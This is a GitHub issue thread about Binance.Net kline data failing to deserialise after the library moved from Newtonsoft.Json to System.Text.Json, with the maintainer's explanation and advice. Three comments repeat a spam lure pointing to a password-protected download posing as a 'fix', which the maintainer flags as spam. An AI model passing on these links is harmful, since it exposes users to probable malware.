### ISSUE TITLE
BinanceSpotKline object serialised as [] is not deserialising back after package upgraded from 9.9.7 to latest 10.2.1

### ISSUE THREAD

**Issue by gmpatel** [JKorf/Binance.Net#1413]
**Describe the bug**

BinanceSpotKline object serialised as [] is not deserialising back after package upgraded from `9.9.7` to latest `10.2.1`

I upgraded Binance.Net package from version `9.9.7` to latest `10.2.1` today. I am storing `BinanceSpotKline` object serialized locally so that I can reuse them without querying to server again and only query missing data to API from the last data I have locally.

After upgraded to latest `10.2.1` today; my old data is not deserialising back to `BinanceSpotKline` object. I checked the object is same as before but Newtonsoft Json is not loading the `JsonConverter` of type `ArrayConverter` used as an attribute to the object `BinanceSpotKline`. And also the same issue with `DateTimeConverter` used as an attribute to couple of properties in the object.

I checked repo of both versions and in `9.9.7` the only supported coverters were for `JsonNet` and now there are converters for `SystemTextJson` in the `CryptoExchange.Net` package under `CryptoExchange.Net.Converters` namespace.

Also, the record cs file for `public record BinanceSpotKline` is using `using CryptoExchange.Net.Converters;` and the `ArrayConverter` of type `JsonConverter` is sitting in the namespace `CryptoExchange.Net.Converters.JsonNet` and not `CryptoExchange.Net.Converters`...

AM I MISSING SOMETHING ?????

**Error**

Newtonsoft.Json.JsonSerializationException: 'Cannot deserialize the current JSON array (e.g. [1,2,3]) into type 'Binance.Net.Objects.Models.Spot.BinanceSpotKline' because the type requires a JSON object (e.g. {"name":"value"}) to deserialize correctly.
To fix this error either change the JSON to a JSON object (e.g. {"name":"value"}) or change the deserialized type to an array or a type that implements a collection interface (e.g. ICollection, IList) like List<T> that can be deserialized from a JSON array. JsonArrayAttribute can also be added to the type to force it to deserialize from a JSON array.

**To Reproduce**

Here is some data I have stored using previous package for the object of type `BinanceSpotKline`. Which is not deserialising back:
`
[1724806200000,59240.99000000,59287.64000000,59168.00000000,59180.65000000,36.43407000,1724806259999,2158688.65118530,3215,6.82118000,404062.30424990,0.0]
[1724806260000,59180.66000000,59200.01000000,59180.65000000,59200.00000000,14.23971000,1724806319999,842911.18083300,850,11.07769000,655730.33961640,0.0]
[1724806320000,59200.00000000,59200.01000000,59138.90000000,59151.00000000,24.04744000,1724806379999,1422758.42960800,1540,10.28466000,608458.30681490,0.0]
[1724806380000,59150.99000000,59154.00000000,59132.43000000,59146.56000000,8.71089000,1724806439999,515201.82114250,1518,3.31259000,195922.05624810,0.0]
[1724806440000,59146.56000000,59149.51000000,59112.01000000,59112.01000000,17.69833000,1724806499999,1046617.69551730,1731,3.95442000,233841.15023840,0.0]
`

**Expected behavior**

It should deserialise back as long as I can see there is no change in object.

**Screenshot**

![bug](https://github.com/user-attachments/assets/5e75c770-9b70-442e-9e1d-2ef3ad11e4a7)

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gmpatel** [comment]
@JKorf what is the above comment for? doesn't seem legit to me...

**Comment by JKorf** [comment]
Agreed, it's spam.

On topic; There is a global usings file which specifies some common namespaces, including `global using CryptoExchange.Net.Converters.SystemTextJson`.
The issue you're having is that the library has switched to System.Text.Json as (de)serialization framework from the old Newtonsoft.Json framework. As such with the latest version when trying to deserialize the data with Newtonsoft it doesn't recognize the attributes on the models so it doesn't know how to deal with it.

You'll need to switch to System.Text.Json to deserialize the data, or you need to first map it to your own model class which you can deseralize it from.

As a side note, the serialization of json array data such as the kline data you mention is currently not supported with System.Text.Json yet, it's something that will be fixed in a later version.

**Comment by gmpatel** [comment]
Wow! So, just for this I have to change to `System.Text.Json`? There is no other way? If so, I can backup old data purge the table and start serializing as an object with. Would that work? That will ignore the attribute and treat it as an object and will serialise with prop names etc as normal!

**Comment by JKorf** [comment]
Yes that will probably work as well. 
Though the safest road would be, also for the future, to have your own model which you serialize to and from. That way you're not depending on a third party model. If say for example Binance decides to rename one of the properties then I'll also rename it in the library. That means your deserialization will fail since it tries to serialize the old data with the old name to the new model with the new name which won't work.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gmpatel** [comment]
@JKorf can't you allow set switching to the default serialization to be used using processor directive which one can set in their project and based on that the namespace will be in action? Just an idea if this is possible?

**Comment by JKorf** [comment]
Yes its possible but not as easy as just switching the namespace. It would be a lot of work to implement and to maintain. And there is a high chance it would lead to bugs. 

I understand it's a bit of a pain in your case, but for 95% of the users there is no difference in the underlying (de)serialization method that's used. I hope you understand.

**Comment by gmpatel** [comment]
Yeah cool. I will do wrapper object and serialise my object so I can maintain it. Thanks!

**Comment by gmpatel** [comment]
It's a known issue and breaking change in my case and need to code it as suggested...

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
